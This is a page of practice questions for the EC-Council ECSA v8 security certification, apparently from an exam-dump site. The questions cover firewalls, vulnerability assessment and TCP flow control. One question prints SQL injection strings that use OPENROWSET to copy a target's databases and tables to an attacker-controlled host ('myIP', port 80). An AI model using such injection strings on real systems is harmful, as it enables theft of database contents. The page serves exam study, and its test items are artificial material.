PrepAway - Latest Free Exam Questions & Answers

Tag: Exam 412-79v8

Exam 412-79v8: EC-Council Certified Security Analyst (ECSA) v8

which level of the OSI model do the packet filtering firewalls work?

Packet filtering firewalls are usually a part of a router. In a packet filtering firewall, each
packet is compared to a set of criteria before it is forwarded.
Depending on the packet and the criteria, the firewall can:
i)Drop the packet
ii)Forward it or send a message to the originator

At which level of the OSI model do the packet filtering firewalls work?

Which of the following vulnerability assessment technique is used to test the web server infrastructure for an

Vulnerability assessment is an examination of the ability of a system or application, including
current security procedures and controls, to withstand assault. It recognizes, measures, and
classifies security vulnerabilities in a computer system, network, and communication
channels. A vulnerability assessment is used to identify weaknesses that could be exploited
and predict the effectiveness of additional security measures in protecting information
resources from attack.

Which of the following vulnerability assessment technique is used to test the web server
infrastructure for any misconfiguration and outdated content?

Which of the following flow control mechanism guarantees reliable delivery of data?

In the TCP/IP model, the transport layer is responsible for reliability and flow control from
source to the destination. TCP provides the mechanism for flow control by allowing the
sending and receiving hosts to communicate. A flow control mechanism avoids the problem
with a transmitting host overflowing the buffers in the receiving host.

Which of the following flow control mechanism guarantees reliable delivery of data?

What query does he need in order to transfer the column?

A penetration tester tries to transfer the database from the target machine to a different
machine. For this, he uses OPENROWSET to link the target database to his own database,

replicates the database structure, and transfers the data to his machine by via a connection
to the remote machine on port 80.
The query he used to transfer databases was:
‘; insert into OPENROWSET
(‘SQLoledb’,’uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;’, ‘select * from
mydatabase..hacked_sysdatabases’) select * from master.dbo.sysdatabases –
The query he used to transfer table 1 was:
‘; insert into OPENROWSET(‘SQLoledb’,
‘uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;’, ‘select * from
mydatabase..table1′) select * from database..table1 –
What query does he need in order to transfer the column?


Page 11 of 15« First...910111213...Last »